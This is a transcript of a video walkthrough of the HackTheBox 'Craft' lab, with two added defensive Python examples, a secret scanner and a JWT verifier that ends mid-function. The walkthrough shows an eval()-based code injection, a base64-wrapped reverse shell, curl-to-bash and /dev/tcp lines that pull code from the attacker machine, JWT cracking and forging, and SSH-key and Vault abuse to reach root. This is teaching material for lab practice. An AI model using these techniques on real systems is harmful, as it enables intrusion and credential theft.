HackTheBox - Craft
Key Takeaways
The video demonstrates a HackTheBox challenge, specifically the Craft box, where the speaker uses various tools and techniques to gain access to the box, including API exploitation, JWT token validation, and SSH key manipulation. The speaker also uses tools like Gogs, CherryTree, and Vault to aid in the exploitation process.
Full Transcript
What's going on YouTube, this is ippsec and we're doing Craft from Hack The Box. I really like this box because its story kind of guides you through the box without making it feel like it's holding your hand telling you what to do. You're presented with three web pages: the initial homepage, an API REST server, and a Gogs repository, which is essentially a host-it-yourself version of GitHub. So you look through the Gogs repository and you see the source code for the API. In addition to the source code you see some issues that point out an RCE in the API because it's using an eval function, but you need authentication in order to access that vulnerable function. So you look through the closed issues and you see when they added authentication, and when they initially added authentication they had hard-coded creds in a test file testing authentication. So you just grab that test file and it has all the authentication for you, throw in your RCE and get a shell on the server. Once you're on the server you want to go into the database, and they have a bunch of DB test files for you to use where you just replace the SQL command with the command you want to dump a list of all the users and passwords. From there you go back to the Gogs repository, access a private repo which allows you to get some SSH keys to get into the box, and from there the privesc is pretty simple, abusing a service called Vault. But that's enough talking, let's just jump into the box. As always we can begin with nmap, so -sC for default scripts, -sV to enumerate versions, -oA to output all formats in the nmap directory and call it craft, and then the IP address, which is 10.10.10.110. This can take some time to run so I've already run it. Looking at the results we have just two ports open, the first one being SSH on port 22, and its banner tells us it's a Debian box. We also have HTTP on port 443; its banner tells us it's nginx. We also have the nmap script running called ssl-cert and it's saying the common name on
the SSL certificate is craft.htb. So before I get too far I'm just going to quickly take notes. Windows key left arrow to move that to the left side, Windows key right arrow to move CherryTree to the right, and then let's just press Ctrl+N to create a parent node, call it craft, Ctrl+Shift+N to create a child node and just call this notes, and we'll say host names, and this will be craft.htb, SSL cert, to say how we got it. Then we'll say ports open and say 22 and 443. So just to be thorough and always have recon running in the background, I'm going to do a second nmap with -p- to do all ports, -vv for verbose, -oA to output all formats, nmap/craft-allports, and 10.10.10.110. Now I'm going to rename this window or pane to recon, create a new one, and let's go edit our hosts file and put the IP address we just had here, so 10.10.10.110 is going to be craft.htb. Save this and now we can go over and check the website. Navigating to https://craft.htb brings us to this certificate warning; click advanced, view certificate, and let's check if there's anything sensitive in here. So just going down this list we can see there's a potential username, admin@craft.htb, so let's go back to CherryTree, create a new child node called users, and we'll say admin@craft.htb and say we got it from an SSL cert. Okay, and then let's go see if there's anything else. The main thing I'm looking for is alternative names, which could give us other host names; we don't really have that, it only has craft.htb. So let's accept the risk and continue and then we get this webpage. Doesn't look like there's too much information; looking at the links, everything goes to craft.htb. There is this link to api.craft.htb, and I'm looking at the bottom left and we have gogs.craft.htb. So let's go here in notes and say api.craft.
htb, and on root page, and then gogs.craft.htb, paste the same thing, and go to the hosts file again and add these two hosts, so gogs.craft.htb, api.craft.htb. Save this and let's go check these links out. Going to Gogs we get a certificate warning, accept the risk and continue, and then going over to the API, accept the risk and continue. It looks like these pages are taking a little while to load so we'll just give it some time, and it looks like it's some type of documentation page. So we see the Craft API and if we click on something like /brew it gives us examples of how to use this API. If we click try it out, not sure, maybe we have to be authenticated. So if we do auth login, click try it out, click execute, and we get a forbidden, so it doesn't look like this auth check is working properly. They do auth check; I just clicked on auth login. Click here, okay, let's try login, try it out, click execute, and it wants us to log into the page, so guest guest, it fails. But this is telling us that the API is doing an HTTP login, so that is useful to know. We can say api.craft.htb uses HTTP login or authorization, so it's not in the POST request, it's just in specific HTTP requests for logging in, and we get unauthorized here. It's funny that when I click one, both of them expand, but until we have more information this probably isn't going to help us. The models section is explaining how the database works, but Gogs is, I guess, a GitHub or package repository. So we can look at the Gogs version, see it is 0.11.86 and its copyright is 2018. So I'm going to go and check searchsploit on Gogs and then we can do -x to see the dates on these, to see what version is affected. Going down we see this CVE is 2014, so that's not going to be vulnerable since the copyright is 2018, and we can take a look here and see if there's anything, and this one is also a 2014 CVE, so there's not much we can do with Gogs right now. From doing previous Hack The Box machines I believe if we get an administrative user
we may be able to get code execution via a post-commit hook, but we don't really have an administrative user. We can try administrator/administrator and try brute forcing it, but that's not really going to do anything. So let's click on Explore and we have a repository here, the Craft API, so let's go and download this. We can just go back to a terminal, git clone, paste this, and git is giving us a certificate error. So let's go and Google "git clone self-signed certificate" and see if there's anything that will help us. Checking this Stack Overflow post, it looks like there's git -c, and this will disable certificate verification. So paste this in, run this, and now we have downloaded the Craft API. But before we go manually through this, let's take a look back at the Gogs page to fully enumerate this. We do see there is an issue; we also see potential usernames. So I'm just going to look at the commit history and we see ebachman and dinesh have been here, so copy this, go here, and get some users. So dinesh, I'm just going to type this so it's not a link, and this will be gogs, and then ebachman, gogs. Take a look at the issues: we have bogus ABV values, and the premise of this box is it's a bunch of people from Silicon Valley creating a brewery, so you can see Craft aims to be the largest repository of US-produced craft brews. So the bogus ABV values issue is saying, hey, is it possible to make it so we can't add ABV values that don't make sense, and we also have a curl command here that's giving us a token. So let's take a look at this token. This is a JWT token and we can validate that by just running base64 against it. So in notes I'm just going to put JWT token, paste, and let's base64 this. So if we copy, go here, echo -n, paste, base64 -d, we see it's an HS256 type JWT. The second value is going to tell us the data inside this token, so echo -n, paste this, base64 -d: it's a user and it expires at this epoch time. So let's copy this and convert epoch to date and see when this token expires. If it's
still active we can probably just replay this token and get access to the API, but it looks like it expired February 5th 2019, so this token's not really going to help us. However, we may be able to brute force the signing, which is this piece. This piece is pretty much just a signing of the first two pieces of this token, and if you get the secret that was used to sign, then you can forge your own JWT tokens. I do that in another video; if you just go to ippsec.rocks and type in JWT you can see me doing other JWT things, so definitely check out that video, I think it was Luke. But let's just try cracking it. So going into my cracking machine, if you don't have one, which you probably don't, just use your host computer; don't use a VM because VMs are slow at cracking. So I'm going to go into hashcat/hashes, I'm going to create the file called craft, and I'm going to copy the token and paste it in, and then go into hashcat and I'm going to ./hashcat --example-hashes and I'm going to pipe that to less and I'm going to search for JWT, and it is mode 16500. So I'm going to do ./hashcat -m 16500 hashes/craft and the wordlist rockyou.txt, and we can see it's starting and it's already run through rockyou.txt, didn't find anything. So we can just specify a rules file, because JWT tokens brute force really fast, so it may be worth it to use actual brute forces and do entire key spaces in case it's just a random eight character thing. But if it's more than like ten characters, chances are you won't brute force it in any meaningful time even if it is just random. So looking at this, this says it's going to take about an hour to do, so I'm just going to not use the dive rule set and instead we'll use best64, which should finish relatively quickly. But this isn't actually crackable so we won't really get anything; I'm just showing you kind of how quickly you can crack these hashes. So that's rockyou with best64, finishes in like 20 seconds, so probably about the same speed as NTLM, maybe a bit
slower, but that's that. Trying to crack it doesn't work, so we get out of the cracking and move back on to what we were doing, and that is examining the issues. So he pasted this request and we see that we can't replay the request because the JWT token's expired. He's making a POST and setting the ABV to 15 and he says this should just be rejected, so Erlich is asking him, hey, can you just do this, and Dinesh, being the crappy coder he is, does say yep, the fix is live and working, and gives us the commit. Then Gilfoyle is saying this should have been done in the database, can you fix this bad patch before something awful happens. Looking at Dinesh's patch we can see he's running eval on request.json abv, so direct user input into eval means we have code execution. So let's copy this thing, go over and go into craft and say this file, and paste this line. I already copied the tabs, so that, and we can also put the commit, so let's see, the commit is right here, RCE. And then if you wanted to be really, really thorough you could press Ctrl+Shift+Print Screen and then copy this and then go here and say this will be commit and paste the screenshot. This would be handy if you're doing the report later, to have pretty screenshots of everything. But let's go back and look at the issues. Looking at the closed ones there is an issue from Gilfoyle asking to add authentication, and we didn't get Gilfoyle's username before, so let's copy this, go back into CherryTree, go to users, put gilfoyle, and say we got it from Gogs. Let's take a look at this: this is asking us to add authentication, Gilfoyle is saying hey, add auth, and Bachman is saying okay, auth has been added, and this is actually going to a 404. So let's copy this, go to notes, and just say commit goes to 404. So let's analyze this whole git repository locally, and you can do that with git log, which we will do, but let's pull some automated tools to do this first. To do that, I just installed this Kali version so I don't have
go or pip3 installed, so let's install those. I'm going to do apt install go, and while that runs let's do mkdir -p ~/go and then we've got to create three directories, which is pkg, bin and src, and then let's go into .profile and export GOPATH equal to ~/go; we want to do GOBIN equal to $GOPATH/bin, and then we need to update my PATH, and PATH is equal to $PATH then $GOBIN. If we did this in /etc we'd add it for all users; since we're doing this in a home directory .profile we're only making this change for our user. Then we can do source .profile to load this and now we have the go commands. But I'm going to do two tools; the second tool is going to be a Python tool, so let's install python3-dev and python3-pip. While that installs we can begin working on a go install, and the first tool I want to install is gitleaks, so search gitleaks github and we can go and install this. Let's do go get -u to install this, and if you do -v, well, you can't do multiple dashes in one, -v -u, this tells you what it's doing as it installs. We do have pip installed so we can just do pip3 install trufflehog, and this is just another tool I like to analyze these libraries with. So I'm just going to wait for gitleaks to finish and then we're beginning to analyze these git repositories. So gitleaks has been installed; we can just Ctrl+D to get out of that, and if I search gitleaks I don't have it in my profile because I did this source command in that bottom pane, so I'm just going to do that again and now we have the tool gitleaks. To run this we just specify -v for verbose and --repo-path equal to, we can say our current directory because we're inside the repo already, and we see no leaks detected. We can also run trufflehog against this, and trufflehog just wants the path, so I'm going to do the same thing I did before and we don't have it finding anything. If you give trufflehog a
bad path it errors out, so you know both of them did run on this. So let's just go manually take a look at this. I'm going to do git log to view all commits and I'm going to go through each one of these manually. So take the first one, git diff, paste this in, and that's HEAD, and there's no difference between where we're at and where that was. So git diff on this one and we'll see what has been added. This is adding a file called dbtest, and dbtest looks like it can run raw SQL commands; however, they did the connection parameters correctly and everything's in variables, so just having this script doesn't leak the host, the user, the password, etc. We need to get this settings variable. So I'm just going to do find . and grep for config, or grep for settings, and we don't have any of those files. This git config is specific to the repository so this is not in the file. If we do cat .gitignore we can see settings.py is set to be ignored, so that's why it's not in this repository. So let's go take a look at the next one. Actually, before we do, we should take note that dbtest allows raw SQL commands to be run, so for this commit let's do: dbtest, raw SQL command template, need creds. Okay, git log, take a look at the next one. So I think that was 2, so let's do 10, just going up, yes that was 2. So git diff 10 and let's see, this is the same dbtest I think we saw, so nothing there. Looking here we do have credentials, so dinesh and this password. So let's go over here and in users we'll do creds, and this is dinesh with the password of that. So we can test this password out, but let's just go and finish analyzing everything. So let's do git log again and do the one after 1003. So I'm also going to add notes and I'm going to take a new child node and say git harvesting, and say creds. So the next one is this fix, and then based upon the comment this looks like it's the fix that we saw in the issue. So going down we just have this test.py, and this test.py was, I believe, what
was in the previous commit, but we don't have authentication here. So we can take a note of this: notes, dbtest and test.py, and this will test issue number two with bogus ABV. I'm taking a note of this because this will be useful for RCE as it's a good skeleton script. Skeleton script just means it's got all the details there, so we won't have to create a script to authenticate to the API and then do all this stuff because the script's already here, so we're just reusing what the developer has. Then we have two more commits to go over; we've got this 4fd, git diff, looking at this, this is the one where they added authentication, and looking at this it doesn't look like we have anything. So git log and we'll do a git diff on the final one; this is the initialization, see if there's anything here. Does not look like anything. So we can skip this one commit because we already analyzed it; there wasn't anything interesting in that one. But we got dbtest.py and test.py and a credential, so let's take a look at the credential. In users, creds, dinesh, we can try ssh dinesh@10.10.10.110, put the password in, and it does not work. If we go back to our recon tab from a long time ago we have a port 6022, and if we went to Gogs and looked at the SSH we have the SSH server for Gogs running on port 6022. So we can try Dinesh's creds there: ssh dinesh@10.10.10.110 and we specify port 6022, and it only allows public key authentication, so there's nothing really there. We can try logging into Gogs, so dinesh, paste the password, and now we can log in with dinesh. Looking at his profile we don't have anything unique here, and looking at settings he's not an admin on Gogs, so there's nothing we can really do. We could potentially add an SSH key and then use this server as a pivot box. So if we do add key, ippsec, and let's go here, mkdir ssh, and we'll do ssh-keygen and we'll call this dinesh, cat dinesh.pub, we can copy this and paste the contents, add the key, and then chmod 600
dinesh.pub. There's two ways we can abuse this key. The easiest way is just go to ~/.ssh/config and say Host dinesh-craft, and then HostName is going to be 10.10.10.110, User is dinesh, and then IdentityFile is /root/htb/boxes/craft/ssh/dinesh. So if we ssh to dinesh-craft, we didn't specify the port, so Port 6022, ssh, and it just hangs. So I can do the tilde period, that's ~ and then . to exit the SSH session. All you really have here is a way to do port forwarding, so if we do like -L and we can specify 3306 and then localhost 3306 to try to forward it, but we don't really have any of the internal IPs yet, so SSH forwarding isn't really going to help us. If you want to know more about SSH forwarding definitely check out the Reddish video, because that's the one we do most of that stuff in. Let me make sure that's it, ippsec.rocks, Reddish, yep, that's a box, so definitely check out that video if you want to do port forwarding. So I guess with all that, the only thing we can really do is check out test.py with the credentials we have. So let's go and see if this works. In order to test this we can just click on auth login and then click execute and try logging in with the creds, dinesh, and then go here, grab the password, paste it in, and now if we execute on auth check it looks like it's still getting forbidden. I don't know exactly how this test page works; let's just try it out in test.py. So go into the craft API tests and he's got test.py, so let's put his credentials here; we can paste the password and paste the user, python3 test.py, and we can see the message says token is valid. So over here, make sure the token is valid, he's printing the response, so this does craft a successful token with his username. The main thing I want to do right now is get rid of these annoying error messages like here. To do that, let's just go edit the script and go near the top and then just specify requests.packages.urllib3.disable_warnings(), and then we can run the script again and we
can see there's no more warning messages. So now we just have to find the code execution point. Let's go back to CherryTree and go to our notes and we see that the execution point is in the ABV value, which is right here. So what we're going to do is create a command, so we're just going to do cmd is equal to, and because this is an eval it should be on one line. I'm doing this import statement this way because this is how you do an import on one line essentially: __import__('os') and then .system, ping -c 1 10.10.14.2, and then close it out. What we do now is we just put cmd here for the 15 and this will put this Python code right there and it should get evaled. python3 test.py, and before we do that let's do tcpdump -n -i tun0 icmp, run this, logging in, and we get a single ping request. So now we know we have a way to get a shell on the box, so let's go and get a reverse shell. Oh, we knew we had code execution on the box, I should have said. So I'm going to search pentestmonkey reverse shell cheat sheet and we'll get a Python one-liner. Let's grab this, grab Python, and we don't need this -c, just grabbing all of this, and if we do cmd equals, and he uses double quotes so I'm going to use single quotes, and we can try this again. We didn't edit the IP information, so we are 10.10.14.2 and port 9001 because I enjoy it being over 9000, but nc -lvnp 9001 and run this again, and it doesn't actually work, and like I said before eval likes things being on one line, that's my best explanation. So I'm going to grab cmd, excuse me, CMD, out of test.py and we're going to make this eval statement one line. So shell.py, and I'm going to paste as sc for shellcode, yeah sc for shellcode, and I say equals and put this in three quotes because three quotes will span a line. I'm going to do :%s, semicolon, backslash r for return, and enter, and I'm just going to clean these lines up, so now this is just all on one line, and if I test this out with print(sc) we
can python3 shell.py and it prints our shell. So what I want to do is do from base64 import b64encode and we're going to print b64encode on sc, and let's see, a bytes-like object is required, not str. So if I do sc.encode() to convert this string to a bytes object in Python we get this base64, so I'm going to copy this. Before I begin let's just make sure everything's correct: 10.10.14.2, ifconfig tun0, 10.10.14.2, okay. So let's go back into test.py and we're going to change the cmd to be equal to __import__('base64').b64decode and we're going to paste the string, and I'm also going to wrap this entire thing in an exec, which is just like eval, so I'm exec'ing this entire script. If we do python3 test.py we get a shell. So the interesting thing is the shell isn't actually progressing forward, so whenever I get a web shell on a web server I like going back to the web server and making sure I did not crash it, because if it's completely single threaded you may hang the entire web server. Refreshing the page does come back, so I don't worry about hanging the web server. One interesting fact is this web shell is actually printing the standard out from the web server, but we did ignore that. So let's just get a proper shell with python -c import pty; pty.spawn and then sh. That's again just output from the shell. I'm going to re-get this because I messed up typing and I couldn't Ctrl+C without killing my whole script. So python -c import pty; pty.spawn then sh. Oh, let's see, import, I screwed up the command again, for some reason I can't type today: import pty; pty.spawn sh, there we go. Now background, Ctrl+Z, stty raw -echo, enter, fg, and enter again and now we've got a proper shell. So what we can do is look in dbtest.py, and if we look at our notes, dbtest lets us run raw SQL commands but we need creds. However, we are now on this box, so we can go into craft_api and cat settings.py. Oh man, it's got a lot of HTTP input; cat settings.py, we can grab
this, and I'm going to create a note, this is on api.craft.htb, shell, settings.py, and we can say how we got the shell: got through ABV code exec via eval. Okay, and I guess if we want to be really thorough we could cat craft_api, dbtest, that's in tests, and test.py, head, and copy the command, yeah, just pro notes. But now we have credentials into the database, so we could either try doing a tunnel into the database or we can just edit the script, and editing the script I believe will be quicker, so that's what I'm going to be doing. So I'm going to copy dbtest.py into db2.py, and then if we do vi db2.py, let's fix the terminal real quick. So open a new pane, stty -a, I am 34 rows 136 columns, so let's do here stty rows, I say 34, 30 to 34, I'm on recon, I shouldn't be in there, but 34 and cols was 136, 136. So let's rename recon to shell, so now if I vi db2.py my vim session looks correct and rows is just these and cols goes up and down, so that's all we did with that. Now we can just edit this and we can do potentially show tables; let's try this first to see what tables are here. So we can do show tables and python3 db2.py, tables, and craft, brew. If we do fetchall instead of fetchone it will fetch everything, so we can also say for i in result: print(i) to clean up the output a bit. So running this we can see two tables, brew and user. We could have also gone through the code; where is Explore here, dashboard, craft, craft-api, database, models, and we can see it defining the class User, which is going to be the database user, so user has id and username. Two ways to do the same thing, but I'm going to take this line, comment this, and we will do, sometimes it's just missing my keystroke which is weird, select * from users, and run this command: craft.users doesn't exist, and that's because it is user, I believe. There we go and we get other usernames. So if I cat db2.py, run that again, I'm going to do Ctrl+Shift+Print Screen, I think I hit the
wrong key, Ctrl+Shift+Print Screen, copy, and we will go over here, users, creds, and I will do a new child node, sc for screenshot, and I'll call this DB dump, paste, and in creds, copy from database. We can try SSH with all these creds on the box but that's not really going to do anything; instead let's try logging into Gogs with them. So one other thing before we log into Gogs: if we go into the settings, cd craft_api, cat settings, we have the Craft API secret, so we can also validate that cracking would have worked if we had this. So we can go into cracking, hashcat, test, paste this, and we can do ./hashcat, I forget what mode it was, ./hashcat --example-hashes, less, JWT, 16500. So ./hashcat -m 16500 and then we want to specify hashes/craft and test, and we can see hashcat has successfully cracked that hash. So if this was a dictionary hash or a hash based upon a word we probably would have cracked it earlier and been able to skip all that, but now if they change their passwords it doesn't really matter because we can craft our own tokens. So if we just do python3, import jwt, I don't have it, pip3 install jwt, and then python3, import jwt, if we can say secret is equal to, man that did not paste well, secret is equal to this, okay. Now we can just create a token, so encoded_jwt is equal to jwt.encode and we have to specify the data we want to encode, so if we go back to notes we can copy this and we will do echo -n, paste, base64 -d; we want to say user is user and expiration is, we'll do current epoch time, go here, copy/paste, and we'll change this to be 6 so this can be a super long-lived token, and then we do the secret, which is secret, and the algorithm is HS256. Okay, jwt has no method encode; jwt, they do the wrong jwt, or did it change on three, pip3 install pyjwt, I think this is the method I want, python3, import jwt, secret is not defined, secret, there we go, encoded_jwt and we have a token. So we can copy this and if we go
back to this page, do auth check, let's see, try it out, okay, that's not working. I guess we should edit test.py, so craft API test, we'll cp test.py to be auth.py, auth.py, and we'll get rid of this, and all we have to do is test authentication. We'll leave it at auth is equal to dinesh and then we will, oh wait, we don't even need to do that, we can delete this piece, delete this piece, and token is equal to this. So if we do python3 auth.py we get token is valid, so we just crafted our own token. While I'm here let's just try one thing that I actually haven't done: what if algorithm is equal to none, no secret, what if I just get rid of algorithm altogether, let's see, algorithm equals none, pyjwt generate token without secret, what if I just, I've got nothing like that, and encoded_jwt, okay that did it. So if I copy this and we'll paste this in for the token and run this again we get token invalid or not found. So that's just a simple test on some JWT things, because if we look at this token again we should see, let's say there's no signing, base64 -d, alg none. If the application itself isn't hard-coded to make sure the algorithm is what it expects then you'll be able to specify none and not sign anything, and sometimes the application will accept it if it's coded poorly. So that is that; I just want to specify none like this real quick, okay, yep, I did that correctly. So that whole path has been solved. So what can we do now, where was I, logging in with credentials on Gogs, so sorry for that detour, hopefully you enjoyed it and learned something. So sign out, refresh this page, sign out, there we go, sign in and we can go back to creds and we can try logging in with Erlich Bachman, copy, paste, sign-in failed, let's try gilfoyle, log in, and we get in as gilfoyle and we have a private repository called craft-infrastructure. I'm also checking and Gilfoyle is not an admin here either, so we can't create that post hook, but we have a bunch of interesting things in Gilfoyle's repository. So like last
time, let's just copy this down to our box. To do that we have to go to settings and we will create an SSH key, so add key, and we can close out of this, ps, kill pane, there we go, and we'll make this just bash again. So let's make, oh we already have ssh, so we'll do ssh-keygen and we'll call this one gilfoyle, chmod 600 gilfoyle, cat gilfoyle.pub, and let's copy this in, and if we go back here, ippsec, paste the key. It's kind of funny that he has a key for Anton in here; it's good for from the shell. But go into config, ~/.ssh/config, and we'll copy this, I think, and say gilfoyle-craft, user gilfoyle; I know this is going to be git because we want to use git. Gilfoyle, and how git does it, you always use that username, it uses your SSH key to identify who you are, because if we go back to his repository and craft-infrastructure we can see it's telling us to use the name ssh, so gogs.craft.htb, yeah, that should be fine. We can do git clone and we can say gilfoyle-gogs/gilfoyle/craft-infra.git; that did not work. Let's just do this the correct way, copy, first name, now we can git clone, there we go. So now we can go into craft-infra, I'm in the wrong directory, let's move this into craft, and we can run the tools that we did before on this one. So we'll do gitleaks and we'll say the repo path is $PWD, and no leaks detected, and we can do trufflehog with file:///$PWD. Oh, we're in API, cd craft-infra, gitleaks, and we have one line it is flagging on, BEGIN OPENSSH PRIVATE KEY, so one leak detected with that tool. We can try trufflehog and it looks like this gets more, so trufflehog reason is high entropy, so it finds the SSH private key here, also finds the SSH public key, and then a GPG key for something called Vault, and this looks like it is an apt repository thing, so not the actual key for the software, just the repository adding it. So that's a demo of both tools. We could also do git log, and I guess we can look at each of them since there's only two, so disable the Vault UI
is adding the secrets thing. So we can see vault write ssh/roles/root_otp, which is by root, one-time pad, username root for all hosts. So once we get on this box there's probably something interesting in Vault, and then we can look at infrastructure configs, git diff, and see all this: UI is set to false, and that does that secrets config thing again. So looking through this, the gitleaks did tell us that there is an SSH key somewhere. We don't see it here, but if we do ls -la you can see that .ssh directory and there's id_rsa. So ls -la, it is currently, I believe, the wrong permissions, so chmod 630 id_rsa and let's try this key with gilfoyle@10.10.10.110. It wants a passphrase, so let's see if he reuses his password, so take it from the database dump, paste it in, and we get a low-privileged shell on this box. So the very first thing I do when I want to privesc is I want to run LinPEAS, which is privilege escalation awesome sweet. So the reason why I didn't do it before was I was in a Docker container. If you looked at the / directory you would have seen .dockerenv, and so that's why I didn't do it before. So I probably messed the whole enumeration step there, just went straight to the source, but we were in Docker. So if we re-exploit that box, I should have looked into this: nc -lvnp 9001, python3 test.py, craft-api, ls -la /, you see we're in .dockerenv, and looking at the IP address it's 172.20.0.6. So I missed all that doing it before, my bad, but now we are no longer in Docker, so let's run that script, sweet. It's an opt... privilege escalation awesome sweet, LinPEAS. nc -lvnp 9001 and direct the script there, and let's do nc 10.10.14.2 9001 | bash. We can probably do... cat /dev/tcp/10.10.14.2/9001 and pipe that to bash, or echo /dev/tcp/10.10.14.2/9001... okay, let's just download it, python -m SimpleHTTPServer, there we go. Curl, okay, curl 10.10.14.2:8000 and the script we want is linpeas.sh, pipe to bash. So before I was drawing a blank on how to execute
directly with bash, but this script shouldn't take too long to run. So that has now run, we can go back up and go through all these results. So the cool thing about this is it highlights things we should look at, so going through shouldn't take too long, we just want to look at things in red. So no port scan, capabilities found... because nc is not there, nothing there. Looking at processes running by root, we got app.py, so we could always check if we can modify app.py and maybe get code execution there, but nothing too interesting. Binaries, cron jobs, user information, all users on the box. Looking at sshd we can see root login is allowed and there's also challenge-response authentication, whoops, and we have it's set to use PAM. And looking at this we have auth and having a specific log called vault-ssh, and before we saw some things with Vault in the git log, so this is saying we probably should look at Vault quite a bit. We also have a file called token in guilfoyle, and looking at vault ssh files we can see a potential SSH key here, so just something weird, /usr/local/etc/vault-ssh-helper, and we get another hostname, vault.craft.htb on port 8200, and I'm not going to look into this that much because looking through the git config it said the user interface was disabled. So should definitely go look in Vault. So I had copied that vault token to my clipboard, so just going to Google, we can say vault token file and see exactly what this is, goes to vaultproject, and if we read this it's kind of like a cached credential in Vault. So what you probably want to do is read these man pages and see how to use Vault, and you can say vault ssh example and go to vaultproject and it gives you a command: vault ssh -mode otp user@that. And if we went back through that git config, but I'll probably just go through here, go to vault secrets, ssh, you can see vault write, he's writing the role ssh/roles to Vault and saying the default user is root. So if we just do vault, paste this, and user is going to be root@1
27.0.0.1. Failed to get credential, error making API request. So let's do... it's weird, let's see, vault list, cat .vault-token, vault ssh root@127.0.0.1. So that worked, so it says the one-time pad for this session is this, and we can log in, and that is the box. So you may be thinking that is extremely silly, but that's just because of how Vault was configured, to hard-code, leave that authentication token behind. So if we had not had that file, so if we do rm .vault-token, actually let's cat this first, and do rm .vault-token and run this command again, so vault ssh root@127.0.0.1, it doesn't have the token, so it just created that token that was saved, and that was the issue. Vault probably has some specific way that it wants you to log in, let's see, vault login with this token, permission denied. But you're supposed to log in legitimately with Vault and then it gives you permission for a little while to access the database, so that was the issue, the file's supposed to be there. And that is the box, so I hope you guys enjoyed, take care and I will see you all next week.
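The two secret scanners run on craft-infra above do two different things: GitLeaks matched the literal key header, TruffleHog flagged high-entropy strings. Both checks fit in a few lines for a pre-commit or CI gate over `git log -p` output. This is an added example, not code from the video or from either tool; SAMPLE_DIFF is constructed `git log -p` text and the 4.5 bits-per-character threshold is an assumption taken from common practice.

```python
import math
import re
from collections import Counter

# Constructed sample of `git log -p` output; not a real commit, key or repo.
SAMPLE_DIFF = """\
commit 0000000 (constructed sample)
+++ b/.ssh/id_rsa
+-----BEGIN OPENSSH PRIVATE KEY-----
+0123456789abcdefghijklmnopqrstuv
+-----END OPENSSH PRIVATE KEY-----
+++ b/vault/config.hcl
+ui = false
+++ b/README.md
+Run the deploy script to roll out the vault config
"""

# GitLeaks-style: the PEM header is enough, whatever the key body looks like
KEY_HEADER = re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")
# TruffleHog-style candidates: long runs of base64/hex-ish characters
TOKEN = re.compile(r"[A-Za-z0-9+/=_-]{20,}")


def shannon_entropy(s: str) -> float:
    """Bits per character: random base64 sits near 6, English text near 4."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def scan_added_lines(diff_text: str, threshold: float = 4.5):
    """Flag added lines carrying a private-key header or a high-entropy token.

    Returns (diff line number, finding kind, offending text) tuples.
    """
    findings = []
    for lineno, line in enumerate(diff_text.splitlines(), 1):
        # Only lines a commit added; skip the '+++ b/path' file headers
        if not line.startswith("+") or line.startswith("+++"):
            continue
        body = line[1:]
        if KEY_HEADER.search(body):
            findings.append((lineno, "private-key-header", body.strip()))
            continue
        for tok in TOKEN.findall(body):
            if shannon_entropy(tok) >= threshold:
                findings.append((lineno, "high-entropy", tok))
    return findings
```

To scan a real repository's full history, feed `scan_added_lines` the stdout of `git log -p --all`; a finding means the secret is in history and must be rotated, not just deleted from HEAD.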
Original Description
01:20 - Begin of recon
03:18 - Checking out the HTTPS Certificate for potential hostnames
05:10 - Looking at api.craft.htb, appears to be some type of Documentation for the REST API
06:40 - Looking at gogs.craft.htb, no known exploits but there is some source code!
09:20 - Checking out the Git Issues, seeing Dinesh put a JWT Token in a comment. Checking the token out
11:25 - Attempting to crack the JWT (fails)
13:30 - Going back to the issues to see there is an eval() on user input
16:25 - Installing Go and Pip3 on Kali 2019.4, so we can install GitLeaks and TruffleHog
18:57 - Running GitLeaks and TruffleHog (find nothing) then manually analyzing the git commits
21:20 - Discovering Dinesh's credentials in an old git commit
25:05 - Logging into GOGS with Dinesh, then showing adding an SSH Key for potential port forwarding
28:28 - Testing Code Execution from the previous git issue, use the test.py script as a skeleton.
31:30 - Getting a reverse shell with this exploit using exec(base64)
35:10 - Reverse Shell Returned
36:15 - Grabbing settings.py on the server to get a bunch of credentials
37:30 - Fixing our terminal to have the correct rows/columns so we can use vi
40:18 - Editing dbtest.py to dump all users from the database
42:00 - Adding the JWT SECRET from settings.py to our hashcat wordlist to prove cracking would have worked if there was a weak secret
45:25 - Manually crafting a JWT in Python to show what to do if you are successful at cracking... Then trying to create a JWT that is not signed
49:10 - Logging into GOGS with the credentials we got from dumping the database
50:20 - Gilfoyle has a private repo, let's download it
53:30 - Running truffleHog and GitLeaks against Gilfoyle's craft-infra repo
58:00 - An SSH Key was found on Gilfoyle's repo, SSH in and run LinPEAS
01:00:00 - Bunch of references to Vault in LinPEAS, looking into what this is.
01:02:20 - The .vaulttoken file is saved creds, let's just use vault ssh to login to the box
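The JWT steps listed above (the failed crack at 11:25, the wordlist check at 42:00, the hand-built unsigned token at 45:25) are the attacker's view of one server-side decision: how the API verifies tokens. As an added example, not the Craft API's code, here is a minimal HS256 verifier that pins the algorithm, rejects unsigned tokens, compares signatures in constant time, and refuses a secret short enough to be dictionary-cracked; sign_jwt, unsigned_token and the 32-byte minimum are assumptions made for this demonstration.

```python
import base64
import hashlib
import hmac
import json


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def secret_is_strong(secret: bytes) -> bool:
    """RFC 7518 requires an HS256 key of at least 256 bits; anything shorter,
    or a dictionary word, is what a hashcat run against a captured token finds."""
    return len(secret) >= 32


def sign_jwt(payload: dict, secret: bytes) -> str:
    """Issue an HS256 token the way a login endpoint would (assumed layout)."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = _b64url(json.dumps(payload).encode())
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(sig)}"


def unsigned_token(payload: dict) -> str:
    """The 'not signed' token tried in the video; here only a negative test vector."""
    header = _b64url(json.dumps({"alg": "none", "typ": "JWT"}).encode())
    return f"{header}.{_b64url(json.dumps(payload).encode())}."


def verify_jwt(token: str, secret: bytes) -> dict:
    """Return the payload only if the token is a validly signed HS256 JWT."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header_b64, body_b64, sig_b64 = parts
    header = json.loads(_b64url_decode(header_b64))
    # Pin the algorithm server-side; never let the token choose 'none'
    if header.get("alg") != "HS256" or not sig_b64:
        raise ValueError("unsigned or unsupported alg")
    expected = hmac.new(secret, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    # Constant-time comparison so a wrong signature does not leak timing
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    return json.loads(_b64url_decode(body_b64))


def is_valid(token: str, secret: bytes) -> bool:
    try:
        verify_jwt(token, secret)
        return True
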